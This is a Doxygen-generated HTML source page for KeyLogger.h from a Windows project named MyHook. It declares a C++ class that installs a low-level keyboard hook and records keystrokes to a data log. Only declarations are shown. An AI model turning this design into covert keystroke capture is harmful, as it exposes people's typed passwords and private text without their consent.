<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<title>MyHook: C:/Documents and Settings/Administrator/My Documents/MyHook/1.2/dev/src/core/KeyLogger.h Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css">
<link href="doxygen.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Generated by Doxygen 1.5.8 -->
<div class="navigation" id="top">
  <div class="tabs">
    <ul>
      <li><a href="index.html"><span>Main&nbsp;Page</span></a></li>
      <li><a href="annotated.html"><span>Classes</span></a></li>
      <li class="current"><a href="files.html"><span>Files</span></a></li>
    </ul>
  </div>
  <div class="tabs">
    <ul>
      <li><a href="files.html"><span>File&nbsp;List</span></a></li>
      <li><a href="globals.html"><span>File&nbsp;Members</span></a></li>
    </ul>
  </div>
<h1>C:/Documents and Settings/Administrator/My Documents/MyHook/1.2/dev/src/core/KeyLogger.h</h1><a href="_key_logger_8h.html">Go to the documentation of this file.</a><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 
<a name="l00016"></a>00016 <span class="preprocessor">#ifndef KEYLOGGER_H</span>
<a name="l00017"></a>00017 <span class="preprocessor"></span>
<a name="l00018"></a>00018 <span class="preprocessor">#include "<a class="code" href="_data_log_8h.html">DataLog.h</a>"</span>
<a name="l00019"></a>00019 <span class="preprocessor">#include &lt;windows.h&gt;</span>
<a name="l00020"></a>00020 
<a name="l00021"></a><a class="code" href="class_key_logger.html">00021</a> <span class="keyword">class </span><a class="code" href="class_key_logger.html">KeyLogger</a>
<a name="l00022"></a>00022 {
<a name="l00023"></a>00023 <span class="keyword">public</span>:
<a name="l00028"></a>00028        <a class="code" href="class_key_logger.html#6267b561a9c001d05a287cfe68f0d487">KeyLogger</a>(<a class="code" href="_data_log_8h.html#c28f253b271e6e9c5bf4ea0f389e67d2">LogTypeName</a> newLogType);
<a name="l00029"></a>00029        
<a name="l00034"></a>00034        <a class="code" href="class_key_logger.html#6267b561a9c001d05a287cfe68f0d487">KeyLogger</a>(<a class="code" href="class_data_log.html">DataLog</a> &amp;newDataLog);
<a name="l00035"></a>00035 
<a name="l00039"></a>00039        <span class="keywordtype">void</span> <a class="code" href="class_key_logger.html#cedd8608d2d9210063631d5bfee137a9">hookIt</a>(<span class="keywordtype">void</span>);
<a name="l00040"></a>00040        
<a name="l00044"></a>00044        LRESULT CALLBACK <a class="code" href="class_key_logger.html#2279fe0280de349deff3ea80c4471136">LowLevelKeyboardProc</a>( <span class="keywordtype">int</span> nCode, WPARAM wParam, LPARAM lParam );
<a name="l00045"></a>00045        
<a name="l00050"></a>00050        <span class="keyword">static</span> LRESULT CALLBACK <a class="code" href="class_key_logger.html#63eeea8432013417a734f91416c717e2">LowLevelKeyboardProcWrapper</a>( <span class="keywordtype">int</span> nCode, WPARAM wParam, LPARAM lParam );
<a name="l00051"></a>00051        
<a name="l00052"></a>00052        
<a name="l00053"></a>00053 <span class="keyword">private</span>:
<a name="l00057"></a>00057         <a class="code" href="class_data_log.html">DataLog</a> *datalog;
<a name="l00058"></a>00058         
<a name="l00062"></a>00062         <span class="keyword">static</span> <a class="code" href="class_key_logger.html">KeyLogger</a> *objPointer;
<a name="l00063"></a>00063         
<a name="l00067"></a>00067         <span class="keywordtype">bool</span> isCapsLock();
<a name="l00068"></a>00068         
<a name="l00074"></a>00074         <span class="keywordtype">bool</span> logicalXOR(<span class="keywordtype">bool</span> p, <span class="keywordtype">bool</span> q);
<a name="l00075"></a>00075 };
<a name="l00076"></a>00076 
<a name="l00077"></a><a class="code" href="_key_logger_8h.html#c949b19bd5f5c79f9d28a62306026d23">00077</a> <span class="preprocessor">#define KEYLOGGER_H</span>
<a name="l00078"></a>00078 <span class="preprocessor"></span><span class="preprocessor">#endif</span>
<a name="l00079"></a>00079 <span class="preprocessor"></span>
</pre></div></div>
<hr size="1"><address style="text-align: right;"><small>Generated on Thu Jul 23 08:49:42 2009 for MyHook by&nbsp;
<a href="http://www.doxygen.org/index.html">
<img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.5.8 </small></address>
</body>
</html>
